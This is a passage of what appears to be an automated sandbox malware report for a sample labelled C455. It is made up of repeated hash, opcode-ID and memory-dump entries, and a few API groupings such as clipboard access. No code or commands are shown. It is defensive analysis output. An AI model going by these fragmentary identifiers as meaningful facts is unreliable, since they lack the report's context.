                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                • Instruction ID: 1e508c19109f690289ecb7e150c7f2c6938486bb39b5b57f9162a3b16ff7e6b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF06DB5E0C3848BC718CF28C48067AFBE4AB9A700F10693DE48AE3341DB31D545CB4A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                • Instruction ID: 9eb83f70a9f4a3b6fca5e27be85fb580e9f1afd9fd44f396ca5b230b7b36fb72
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F046B410D3919FC300DF29D29051BFBE0ABD5318FA4AA5CE8DA5B212D334C9028B4A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                • Instruction ID: c7ad2f68b0c15b939a73d3a20eb6129bb2eee434c6a4c2908bab826003c7ef59
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEF0EDB1688301BAF6348A00DD43F6BB6B49B55B04F301528B344790E1E5E2B549870E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                • Instruction ID: 001cc82e3f3b6fbc713f0ebe7bfb5deed8cb6cdfdc17f795a23665b35cba77f5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F0A735B456808BE704CF38E82195ABBE2E397324F145A7DD641D3751D639C8018605
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                • Instruction ID: 3797ade831d34e95ca28bf8a0846ba522932db1933c5ccef964036b0196f4b47
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BED0972480C63AC30E2A0F1401100FCB7320A03701B8B51E5DCF1FF082CB72CC872258
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                • Instruction ID: 1df588a2e4b4aa928c64738671ede7438a04b52bc81610de26bc0feeadf8ebf3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12418E7190C7918ED301AF7C988836FBEE09B96314F084A7DE8D986392D6788648C793
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9f0000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: L
                                                                                                                                                                                                                                                                • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                • Instruction ID: d1f7fae1c21746ec1bf74ede152d38c0c07055f92415dc63a84ada7e01a4b631
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D412B7110CBC18ED321DB38845869EBFE16BE6220F188A9CE5F5873E2D6748549CB53
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: L
                                                                                                                                                                                                                                                                • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_C455.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86